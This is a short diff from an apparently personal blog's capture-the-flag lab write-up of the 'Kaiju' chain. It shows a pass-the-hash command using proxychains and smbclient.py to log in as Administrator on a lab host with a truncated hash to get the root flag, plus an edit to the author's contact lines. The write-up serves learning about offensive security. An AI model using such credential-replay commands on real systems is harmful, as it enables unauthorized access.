ethicxz/ethicxz.github.io/_posts/2024-09-01-VL Kaiju Chain.md

 # and u can connect to the smb to retrieve the root flag
 proxychains -q smbclient.py 'bersrv100.kaiju.vl'/'Administrator'@10.10.200.181 -hashes :'0b[...]40'
 ```
-Nice ! if you have any questions or comments on this write up you can dm me on [instagram](https://instagram.com/eliott.la) or on discord : 'ethicxz.'
+Nice !
+If you have any questions you can dm me on discord : 'ethicxz.'